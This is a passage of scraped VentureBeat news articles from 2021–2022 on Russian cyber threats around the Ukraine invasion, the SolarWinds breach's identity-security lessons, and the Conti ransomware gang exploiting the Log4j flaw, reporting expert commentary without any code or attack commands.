SentinelOne who gave the malware its name, reported that the wiper erases Windows devices, after it deletes shadow copies and manipulates the Master Boot Record (MBR) after a reboot. “After a week of defacements and increasing DDoS attacks, the proliferation of sabotage operations through wiper malware is an expected and regrettable escalation,” Guerrero-Saade wrote. Ultimately, the risk has only intensified that the cyberattacks “could extend out of Ukraine, and impact NATO and EU member states,” researchers at the Digital Shadows Photon Research team said Thursday. “This has already been observed with HermeticWiper impacting networks in Latvia and Lithuania.” The 2017 NotPetya attack “immediately springs to mind,” the Digital Shadows researchers said. Ordered by the Russian government and initially targeted at companies in Ukraine, the NotPetya worm ended up spreading worldwide. It remains the costliest cyberattack to date, with damages of $10 billion. Additionally, Russia-based cybercriminals “may also be emboldened or otherwise encouraged by Russia’s actions,” the Digital Shadows researchers said. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,148
2,022
"Cyber threat grows after Russia SWIFT sanctions over Ukraine | VentureBeat"
"https://venturebeat.com/2022/02/26/cyber-threat-grows-after-russia-swift-sanctions-over-ukraine"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Cyber threat grows after Russia SWIFT sanctions over Ukraine Share on Facebook Share on X Share on LinkedIn Ukraine is getting international support. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Cyber experts warned of increased risk of cyberattacks from Russia, following the latest sanctions announced over Ukraine — which dropped major Russian banks from the SWIFT financial system. Russian President Vladimir Putin has threatened retaliation against the west for what he perceives as interference in the country’s unprovoked assault on its neighbor Ukraine. And as is well known, both the Russian government itself and affiliated cybercriminal gangs possess significant cyberattack capabilities — and Russia has a history of using them in geopolitical contexts. Authorities in the U.S. and U.K. blamed Russia for last week’s massive distributed denial-of-service (DDoS) attacks in Ukraine. And fresh DDoS attacks, as well as destructive cyberattacks that involved wiper malware, struck Ukraine on Wednesday just ahead of the invasion. But thus far, “I’m willing to bet that the Russians haven’t used even a fraction of the bullets in their cyber arsenal,” said Eric Byres, CTO of cyber firm aDolus Technology, in an email. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Punishing Putin Today, several large Russian banks were removed from SWIFT in a move coordinated by the U.S. and the European Commission, as well as by the U.K., France, Germany, Italy and Canada. SWIFT, which stands for Society for Worldwide Interbank Financial Telecommunication, is a messaging system that enables banks to transact with each other internationally. The move essentially prevents the Russian banks from carrying out international transactions, according to reports. While seen as a necessary step to penalize Putin for his invasion of Ukraine — already responsible for at least hundreds of casualties, including Ukrainian civilians — the move nevertheless raises the likelihood that Putin will respond against the west, including potentially with a wave of cyberattacks. Previously, expelling Russian banks from SWIFT had been characterized by some as the “last resort” and the “nuclear option.” “Putin/Russia [is] getting completely isolated economically & diplomatically,” wrote Dmitri Alperovitch, cofounder and former CTO of CrowdStrike and a Russian expat, in a tweet today. “The danger: Putin has very little to lose now. He is cornered. May go all out on economic and cyber retaliation,” wrote Alperovitch, who is now executive chairman at the Silverado Policy Accelerator think tank. ‘Shields up’ The expulsion from SWIFT is a “significant escalation from the initial sanctions announced on Thursday,” said Rick Holland, CISO at Digital Shadows, in an email. “The SWIFT removal significantly increases the risks of state-executed or state-encouraged Russian cyberattacks against the West,” Holland said. Before the announcement, he noted, ransomware groups including Conti and CoomingProject had pledged to aid Russia from a cyber perspective in its efforts over Ukraine. “If Russia encourages or even incents cybercriminal targeting against Western companies, the threat level increases dramatically,” Holland said. “There is also a risk of a potential escalatory spiral if the U.S. retaliates against these attacks.” Ultimately, “as the Cybersecurity and Infrastructure Security Agency (CISA) says, we need ‘ Shields Up ‘ right now — because the cyber threat level for the financial and energy sectors, in particular, is perhaps the highest it has been in years,” he said. In the past, many in the west have made the assumption that Putin would stop short of unleashing the full brunt of its cyber capabilities on the west over Ukraine. “I originally believed that Putin was a rational actor that wouldn’t want to launch major cyberattacks in the U.S., as that would provoke similar attacks in response,” Byres said. “After all, his goal was to subdue Ukraine, not the U.S.” However, “after reading the full translation of his speech on Tuesday, reviewing the commentary from a number of Russian political analysts and talking to cyber analysts looking at known intrusions in the U.S., I’m not so sure anymore,” Byres said. “I worry that Putin believes he is bulletproof and the U.S. is weak.” Putin has made it clear that the entire western world is his enemy and all options are on the table, according to Byres. Ukraine’s ‘IT army’ Meanwhile, cyber efforts in Ukraine itself appeared to advance further on Saturday. Mykhailo Fedorov, Ukraine’s vice prime minister, announced on Twitter, “We are creating an IT army.” “We need digital talents,” wrote Fedorov , who also holds the title of minister of digital transformation — sharing a link to a Telegram channel where he said operational tasks will be distributed. “We continue to fight on the cyber front.” Anonymous is the most visible group to pledge a cyber offensive against Russia on behalf of Ukraine, but some of the most sophisticated hacker groups are known to avoid attention as much as possible — including some that are believed to be aligned with the U.S. and western countries. On Friday, Christian Sorensen, a former U.S. Cyber Command official, told VentureBeat that “hacktivists around the world [will be] working against Russia, because they are the aggressor.” “I think things will ramp up against western targets, but Russia and Belarus will be targeted by these groups even more” said Sorensen, formerly the operational planning team lead for the U.S. Cyber Command. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,149
2,022
"Should U.S. launch a cyberattack offensive against Russia? Cyber experts are mixed | VentureBeat"
"https://venturebeat.com/2022/02/24/should-u-s-launch-a-cyberattack-offensive-against-russia-cyber-experts-are-mixed"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Should U.S. launch a cyberattack offensive against Russia? Cyber experts are mixed Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. While the U.S. will not be sending in troops in response to Russia’s unprovoked invasion of Ukraine, NBC News reported that advisers have presented U.S. President Joe Biden with options for “massive cyberattacks” aimed at disrupting Russia’s military efforts. The report published today, which cited four sources familiar with the matter, was dismissed by a White House spokesperson. However, the NBC News report itself specified that cyberattacks would be either covert or clandestine military operations, and the U.S. would never publicly acknowledge the activities. The proposals include the use of U.S. “cyberweapons” in an unprecedented manner — “on a scale never before contemplated” — to target Russia’s military, according to the NBC News report. Agencies including U.S. Cyber Command, the NSA and the CIA would be among those with a role in the operation, according to the report. Mixed responses In comments to VentureBeat on Thursday, cybersecurity experts provided a range of perspectives on the idea, from cautious support of the general concept to wariness — due in part to concerns about whether U.S. cybersecurity defenses would be up to the challenge of an cyber escalation involving Russia. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Hitesh Sheth, president and CEO at Vectra, said that it’s “imperative” that the U.S. “consider offensive options” in this situation. However, “going on the offensive without the right technology to defend ourselves in cyber space would be bad strategy,” Sheth said. And given the challenges of executing strong cybersecurity across critical infrastructure in the U.S., a retaliation by Russia could have “devastating” impacts on services that Americans depend on, said John Hellickson, field CISO and executive advisor at Coalfire. “We have a lot of work yet to do here at home to ensure such retaliatory attacks could be sufficiently thwarted, as evidenced by very public ransomware and similar attacks recently,” Hellickson said. “I believe we need to avoid crossing the line of such considerations, as it’s difficult to predict the impacts of a likely retaliation.” It’s of course no secret that Russia already wages cyber warfare against the U.S. on a regular basis, said Leo Pate, managing consultant at nVisium. And “just because one country invades another, doesn’t mean a new call-to-action needs to be proclaimed,” Pate said. ‘Creative ways’ Christian Sorensen, former operational planning team lead for the U.S. Cyber Command, said that “there are definitely creative ways that cyber could be used to have an impact on Russia.” “This creativity brings new options,” said Sorensen, who is now founder and CEO of cybersecurity firm SightGain. “However, we have to be careful because: cyber is ambiguous in attribution and perception, somewhat unpredictable in impact, and therefore very hard to predict response especially since Russia does not use the same playbook.” Ultimately, “I have confidence that our strategy and policy approach will be informed and deliberate in response to the situation,” he said. Cyber operations are a “low-cost way to inflict inconvenience” on an adversary, said John Bambenek, principal threat hunter at Netenrich. “But in the absence of conventional military force, it will, at best, slow Russia down,” Bambenek said. “This provides the opportunity to look like we are ‘doing something,’ without the consequences of doing what would be effective to counter this invasion.” Starting a cyberwar? Danielle Jablanski, OT cybersecurity strategist at Nozomi Networks, said that even the “most well-informed intelligence professionals and war planners still do not know what escalation looks like in an unprecedented exchange of cyber warfare.” “Any cyber operation to counter Russian military aggression in Ukraine that wants to avoid encouraging Putin to take more drastic steps cannot threaten the lives and safety of innocent civilians,” Jablanski said. “Cyber weapons might include zero day exploits and the potential to impose high costs on an adversary, but they also potentially lead to unintended consequences which might not be justifiable if unprovoked.” Hellickson added that “although it would be interesting to see the true capabilities of the US Cyber Command and supporting agencies in response to the Russian invasion of Ukraine, launching a cyberattack would take it to a whole new level while setting a dangerous precedent going forward.” Ultimately, it would raise the question, “Would this cyberattack be considered a direct act of war?” he said. “The most well-informed intelligence professionals and war planners still do not know what escalation looks like in an unprecedented exchange of cyber warfare.” ‘Menu of options’ The NBC News report, which indicated that Biden has a “menu of options” for intervening with cyberattacks against Russia on Ukraine’s behalf, is not accurate, a White House spokesperson said Thursday. “This report on cyber options being presented to @POTUS is off base and does not reflect what is actually being discussed in any shape or form,” said White House press secretary Jen Psaki on Twitter. However, Sam Curry, CSO at Cybereason, said it wouldn’t be surprising if President Biden’s top advisors really had presented him with a variety of options to consider, including cyber counterstrikes. “Counterstriking is within the power of the government — and simply saying it forces the stakes higher for Putin and Russia,” Curry said. While aimed at disrupting military operations, NBC News reported that the proposed cyberattacks would impact more than just the military, however. The options include disruption of internet connectivity throughout Russia, a shutdown of electric power and even “tampering with railroad switches to hamper Russia’s ability to resupply its forces,” several of the sources told NBC News. Three of the four sources cited in the report are said to be part of the intelligence community. Additionally, according to the report, these options aren’t only meant for use if Russia launches cyberattacks against the U.S. — as the Department of Homeland Security warned about weeks ago. The options include a “preemptive” cyber strike against Russia in response to the country’s unprovoked assault on its neighbor Ukraine, NBC News reported. Notably, the cyberattacks that are being considered would be intended only at disruption — rather than destruction — of any Russian systems or infrastructure, which would keep the attacks from meeting the definition of an “act of war,” according to the report. Cyberwarfare already under way Russian cyber offensives have already been playing a role in the country’s build-up to its assault this week. Authorities in the U.S. and U.K. blamed Russia for last week’s massive distributed denial-of-service (DDoS) attacks in Ukraine. Fresh DDoS attacks, as well as destructive cyberattacks that involved wiper malware, struck Ukraine on Wednesday just ahead of the invasion. The attacks — which researchers say included ransomware as a possible decoy or distraction in some instances — have notably also impacted machines in the NATO countries of Lithuania and Latvia, according to Symantec researchers. In remarks at the White House today, Biden cited the cyberattacks as among the activities that led up to the Russian invasion. In his White House remarks, Biden reiterated a statement he’d made last week, saying that “if Russia pursues cyberattacks against our companies, our critical infrastructure, we are prepared to respond.” “For months, we’ve been working closely with the private sector to harden our cyber defenses, sharpen our ability to respond to the Russian cyberattacks,” Biden said in the remarks today. The address also included an announcement of new sanctions against Russian financial institutions and individuals. Russian retaliation In his address prior to the invasion, Russian President Vladimir Putin had threatened that “whoever tries to interfere with us … should know that Russia’s response will be immediate and will lead you to such consequences that you have never experienced in your history.” Russia has “multiple options at its disposal to initiate cyber warfare against the U.S. and its western allies. Any attack could seriously impact our critical infrastructures,” said Eric Byres, CTO of aDolus Technology. “The simplest action at Putin’s disposal is to take the muzzle off the ransomware actors operating out of Russia. The last few months have been suspiciously quiet in terms of ransomware activity, and I suspect that was deliberate,” Byres said. “Moscow could now subtly message the ransomware community that it is open season and then sit back to watch the chaos. This strategy also has the advantage of deniability: it is hard to prove a ransomware attack has been sanctioned by the Russian government.” Beyond that, Moscow could also take a more active approach in cyberattacks, “as we’ve seen in Georgia, Ukraine and the world in general,” he said. “Both Russia and its ransomware-proxies have become proficient in both software supply chain attacks and OT-focused attacks. These are likely to be the next wave of a coordinated Russian cyber/military offensive.” No cyberattacks impacting the U.S. or Western European countries, that are suspected to have a connection to the invasion of Ukraine, have been reported as of this writing. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,150
2,022
"'Reckless cowboy': U.S. may underestimate Putin's cyber strategy | VentureBeat"
"https://venturebeat.com/2022/02/25/reckless-cowboy-u-s-may-underestimate-putins-cyber-strategy"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages ‘Reckless cowboy’: U.S. may underestimate Putin’s cyber strategy Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Cybersecurity veteran Eric Byres says that with Russia’s invasion of Ukraine this week, a lot has changed about his view of Vladimir Putin’s potential cyberattack strategy against the U.S. and other Western nations. And not in a good way. Byres, who’s spent decades in the security industry and is now CTO of aDolus Technology , a provider operational technology (OT) software supply chain security, has been watching the actions and statements of Putin closely. His goal has been to figure out what all of this might say about Russia’s potential for launching cyberattacks against the West in connection with Ukraine. And similar to the way that many experts did not expect Russia to actually embark on a full-on military invasion of Ukraine, Byres says that the cyber industry may be underestimating what Putin is actually wiling to do from a cyber perspective. It is known industry-wide that Russia and government-linked groups have a significant cyber offense capability — it’s one of the biggest drivers for the security industry, after all — many in the West have made the assumption that Putin would stop short of unleashing the full brunt of these forces on the U.S. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! That assessment might be dangerously wrong Byres warns. “I originally believed that Putin was a rational actor that wouldn’t want to launch major cyberattacks in the U.S., as that would provoke similar attacks in response,” Byres said. “After all, his goal was to subdue Ukraine, not the U.S.” However, “after reading the full translation of his speech on Tuesday, reviewing the commentary from a number of Russian political analysts and talking to cyber analysts looking at known intrusions in the U.S., I’m not so sure anymore,” Byres said. “I worry that Putin believes he is bulletproof and the U.S. is weak.” ‘Could be very bad’ Ultimately, “we could have a repeat of the thinking in Japan before Pearl Harbor,” Byres said. “If so, the West could be underestimating how much of a reckless cowboy he is — and that could be very bad.” Putin has made it clear that the entire Western world is his enemy and all options are on the table, according to Byres. In his speech on Thursday, for instance, Putin said that “I would now like to say something very important for those who may be tempted to interfere in these developments from the outside. No matter who tries to stand in our way or all the more so create threats for our country and our people, they must know that Russia will respond immediately, and the consequences will be such as you have never seen in your entire history.” In other words, “any country and its infrastructure is fair game for a cyberattack if Russia runs into significant resistance in Ukraine. I don’t think that this will be limited to companies directly dealing with Ukraine,” said Byres, previously the inventor of Tofino security technology, a widely deployed firewall for industrial control systems (ICS). Russian cyber offensives have already been playing a role in the country’s build-up to its assault on Ukraine this week. Authorities in the U.S. and U.K. blamed Russia for last week’s massive distributed denial-of-service (DDoS) attacks in Ukraine. Fresh DDoS attacks, as well as destructive cyberattacks that involved wiper malware, struck Ukraine on Wednesday just ahead of the invasion. “The West could be underestimating how much of a reckless cowboy he is — and that could be very bad.” U.S. cyber options As far as the U.S. goes, while the country will not be sending in troops in response to Russia’s unprovoked invasion of Ukraine, NBC News reported Thursday that advisers have presented U.S. President Joe Biden with options for “massive cyberattacks” aimed at disrupting Russia’s military efforts. The report, which cited four sources familiar with the matter, was dismissed by a White House spokesperson. However, the NBC News report itself specified that cyberattacks would be either covert or clandestine military operations, and the U.S. would never publicly acknowledge the activities. The proposals include the use of U.S. “cyberweapons” in an unprecedented manner — “on a scale never before contemplated” — to target Russia’s military, according to the NBC News report. Agencies including U.S. Cyber Command, the NSA and the CIA would be among those with a role in the operation, according to the report. In comments to VentureBeat on Thursday, cybersecurity experts provided a range of perspectives on the idea, from cautious support of the general concept to wariness — due in part to concerns about whether U.S. cybersecurity defenses would be up to the challenge of a cyber escalation involving Russia. Hitesh Sheth, president and CEO at Vectra, said that it’s “imperative” that the U.S. “consider offensive options” in this situation. However, “going on the offensive without the right technology to defend ourselves in cyberspace would be bad strategy,” Sheth said. And given the challenges of executing strong cybersecurity across critical infrastructure in the U.S., a retaliation by Russia could have “devastating” impacts on services that Americans depend on, said John Hellickson, field CISO and executive advisor at Coalfire. “We have a lot of work yet to do here at home to ensure such retaliatory attacks could be sufficiently thwarted, as evidenced by very public ransomware and similar attacks recently,” Hellickson said. “I believe we need to avoid crossing the line of such considerations, as it’s difficult to predict the impacts of a likely retaliation.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,151
2,021
"Top lesson from SolarWinds attack: Rethink identity security | VentureBeat"
"https://venturebeat.com/2021/11/18/top-lesson-from-solarwinds-attack-rethink-identity-security"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Top lesson from SolarWinds attack: Rethink identity security Share on Facebook Share on X Share on LinkedIn Credit: REUTERS/Brendan McDermid Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Among the many lessons from the unprecedented SolarWinds cyberattack , there’s one that most companies still haven’t quite grasped: Identity infrastructure itself is a prime target for hackers. That’s according to Gartner’s Peter Firstbrook, who shared his view on the biggest lessons learned about the SolarWinds Orion breach at the research firm’s Security & Risk Management Summit — Americas virtual conference this week. The SolarWinds attack — which is nearing the one-year anniversary of its disclosure — has served as a wake-up call for the industry due to its scope, sophistication, and method of delivery. The attackers compromised the software supply chain by inserting malicious code into the SolarWinds Orion network monitoring application, which was then distributed as an update to an estimated 18,000 customers. The breach went long undetected. The attackers, who’ve been linked to Russian intelligence by U.S. authorities, are believed to have had access for nine months to “some of the most sophisticated networks in the world,” including cybersecurity firm FireEye, Microsoft, and the U.S. Treasury Department, said Firstbrook, a research vice president and analyst at Gartner. Other impacted federal agencies included the Departments of Defense, State, Commerce, and Homeland Security. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Firstbrook spoke about the SolarWinds attack, first disclosed on December 13, 2020, by FireEye, during two talks at the Gartner summit this week. The identity security implications of the attack should be top of mind for businesses, he said during the sessions, which included a Q&A session with reporters. Focus on identity When asked by VentureBeat about his biggest takeaway from the SolarWinds attack, Firstbrook said the incident demonstrated that “the identity infrastructure is a target.” “People need to recognize that, and they don’t,” he said. “That’s my biggest message to people: You’ve spent a lot of money on identity, but it’s mostly how to let the good guys in. You’ve really got to spend some money on understanding when that identity infrastructure is compromised, and maintaining that infrastructure.” Firstbrook pointed to one example where the SolarWinds hackers were able to bypass multifactor authentication (MFA), which is often cited as one of the most reliable ways to prevent an account takeover. The hackers did so by stealing a web cookie, he said. This was possible because out-of-date technology was being used and classified as MFA, according to Firstbrook. “You’ve got to maintain that [identity] infrastructure. You’ve got to know when it’s been compromised, and when somebody has already got your credentials or is stealing your tokens and presenting them as real,” he said. Digital identity management is notoriously difficult for enterprises, with many suffering from identity sprawl—including human, machine, and application identities (such as in robotic process automation). A recent study commissioned by identity security vendor One Identity revealed that nearly all organizations — 95% — report challenges in digital identity management. The SolarWinds attackers took advantage of this vulnerability around identity management. During a session with the full Gartner conference on Thursday, Firstbrook said that the attackers were in fact “primarily focused on attacking the identity infrastructure” during the SolarWinds campaign. Other techniques that were deployed by the attackers included theft of passwords that enabled them to elevate their privileges (known as kerberoasting); theft of SAML certificates to enable identity authentication by cloud services; and creation of new accounts on the Active Directory server, according to Firstbrook. Moving laterally Thanks to these successes, the hackers were at one point able to use their presence in the Active Directory environment to jump from the on-premises environment where the SolarWinds server was installed and into the Microsoft Azure cloud, he said. “Identities are the connective tissue that attackers are using to move laterally and to jump from one domain to another domain,” Firstbrook said. Identity and access management systems are “clearly a rich target opportunity for attackers,” he said. Microsoft recently published details on another attack that’s believed to have stemmed from the same Russia-linked attack group, Nobelium, which involved an implant for Active Directory servers, Firstbrook said. “They were using that implant to infiltrate the Active Directory environment— to create new accounts, to steal tokens, and to be able to move laterally with impunity — because they were an authenticated user within the environment,” he said. Tom Burt, a corporate vice president at Microsoft, said in a late October blog post that a “wave of Nobelium activities this summer” included attacks on 609 customers. There were nearly 23,000 attacks on those customers between July 1 and Oct. 19, “with a success rate in the low single digits,” Burt said in the post. Monitoring identity infrastructure A common question in the wake of the SolarWinds breach, Firstbrook said, is how do you prevent a supply chain attack from impacting your company? “The reality is, you can’t,” he said. While companies should perform their due diligence about what software to use, of course, the chances of spotting a malicious implant in another vendor’s software are “extremely low,” Firstbrook said. What companies can do is prepare to respond in the event that happens-and a central part of that is closely monitoring identity infrastructure, he said. “You want to monitor your identity infrastructure for known attack techniques — and start to think more about your identity infrastructure as being your perimeter,” Firstbrook said. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,152
2,021
"Log4j flaw gets big attention from 'ruthless' ransomware gang | VentureBeat"
"https://venturebeat.com/2021/12/22/log4j-flaw-gets-big-attention-from-ruthless-ransomware-gang"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Log4j flaw gets big attention from ‘ruthless’ ransomware gang Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. The prominent ransomware gang Conti has expanded its efforts to exploit the Apache Log4j vulnerability, likely seeing the widespread flaw as the basis for a new wave of attacks, according to security researchers. Researchers at cybersecurity firms Qualys and AdvIntel told VentureBeat that they’ve observed activities by Conti to exploit the critical vulnerability in Log4j logging software, known as Log4Shell, in recent days. Qualys has observed “attempted ransomware attacks, some of which have been successful – by Conti, Khonsari, and some nation-state-backed adversaries,” said Travis Smith, director of malware threat research at Qualys, in an email to VentureBeat. Specifics of the attacks were not disclosed. Meanwhile, AdvIntel shared findings with VentureBeat indicating that Conti has assembled a full attack chain around the Log4Shell vulnerability and has launched initial attempted attacks. Late last week, AdvIntel became the first cyber firm to report spotting Conti in action around the Log4j vulnerability. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! So far, there’s been no public disclosure of a successful ransomware breach stemming from the Log4j vulnerability. But the widespread and trivial-to-exploit flaw in Log4j “is a dream come true for ransomware groups,” said Eyal Dotan, founder and chief technology officer at Cameyo, in an email. Full attack chain Khonsari, which was the first ransomware family publicly disclosed by researchers to exploit Log4Shell, has now been joined by the Conti and TellYouThePass families of ransomware, according to researchers. In its December 17 report, AdvIntel said that Conti has been observed to be exploiting the vulnerability in Log4j to gain access and move laterally on vulnerable VMware vCenter servers. Since publishing that report, AdvIntel has observed additional activities by Conti around Log4Shell, the company told VentureBeat. Along with identifying Conti’s full attack chain, “we have seen and observed the direct usage [by Conti] across different cases targeting VMware vCenter,” AdvIntel CEO Vitali Kremez said in an email. Conti’s attack chain includes deployment of the Emotet botnet and the use of Cobalt Strike for reconnaissance, privilege escalation, payload drop, and data-stealing operations, said Yelisey Boguslavskiy, head of research at AdvIntel, in an email to VentureBeat. “For Conti, this is a major leap in their offensive operations, as they can now experiment and diversify their arsenal,” Boguslavskiy said. “This means, if a certain attack vector, like VPN accesses, becomes less profitable, they can always compensate by investing more in Log4j. Additionally, it gives them another edge in competition with smaller groups who can not afford the proper research to exploit such vulnerabilities efficiently.” AdvIntel’s research on Conti’s activities was based on primary source intelligence, including victim breach intelligence and subsequent incident response, he said. In a statement responding to the AdvIntel report, VMware said that “the security of our customers is our top priority” and noted that it has issued a security advisory that is updated regularly. “Any service connected to the internet and not yet patched for the Log4j vulnerability (CVE-2021-44228) is vulnerable to hackers, and VMware strongly recommends immediate patching for Log4j,” the company said in the statement. ‘Ruthless’ organization Conti is believed to be a Russian ransomware group that formerly went by the name Wizard Spider. In a June report , Richard Hickman of Palo Alto Networks’ Unit 42 research group said that Conti “stands out as one of the most ruthless of the dozens of ransomware gangs that we follow.” “The group has spent more than a year attacking organizations where IT outages can have life-threatening consequences: hospitals, 911 dispatch carriers, emergency medical services, and law enforcement agencies,” Hickman wrote in the report. For instance, a May 2021 attack in Ireland “prompted the shutdown of the entire information technology network of the nation’s healthcare system – prompting cancellation of appointments, the shutdown of X-ray systems and delays in COVID testing,” he wrote. As of the June report, the FBI had found that more than 400 cyberattacks were connected to Conti—with three-fourths of the attacks against organizations based in the U.S. Ransom demands have reached upwards of $25 million, which also places Conti among the “greediest” ransomware groups, Hickman wrote. Sophisticated attacks Conti plays a significant role in today’s threat landscape due to its scale, Smith said. “Conti is always after ransomware and is incredibly strategic and tactical with their approach,” he said. “They do not simply send out a mass spray of phishing emails—they look to gain footholds in environments and move around as quietly as possible until they locate crown jewels.” Given that Log4Shell enables remote execution of code by unauthenticated users, “it’s going to make sophisticated actors such as Conti wildly successful,” Smith said. “It will allow groups to do reconnaissance, move laterally, and ultimately deploy ransomware.” Conti faces less of a challenge in how to exploit Log4j and more of a challenge in competing with other threat actors for available attack opportunities, Dotan said. “The fastest ransomware groups able to reach most vulnerable servers would be winning this race,” he said. And though major ransomware attacks deriving from Log4j have not yet come to light, that doesn’t mean that ransomware groups aren’t busy preparing. “If you are a ransomware affiliate or operator right now, you suddenly have access to all these new systems,” said Sean Gallagher, a senior threat researcher at Sophos Labs. “You’ve got more work on your hands than you know what to do with right now.” Preparations needed Still, while the Log4j vulnerability itself is considered very easy to exploit, a fair amount of legwork is required to utilize it for deploying ransomware. Post-exploitation discovery work needs to take place before a major ransomware attack can be launched, said Ed Murphy, head of product at Huntress. “It’s not a vulnerability that’s persistent across your and my laptop. So it’s not something I can just reach out and deploy a mass ‘spray and pray’ ransomware attack,” Murphy said in an interview. Log4j affects servers, and most ransomware operators will not want to just ransom a single server, which probably has backups, he noted. “Where they actually gain 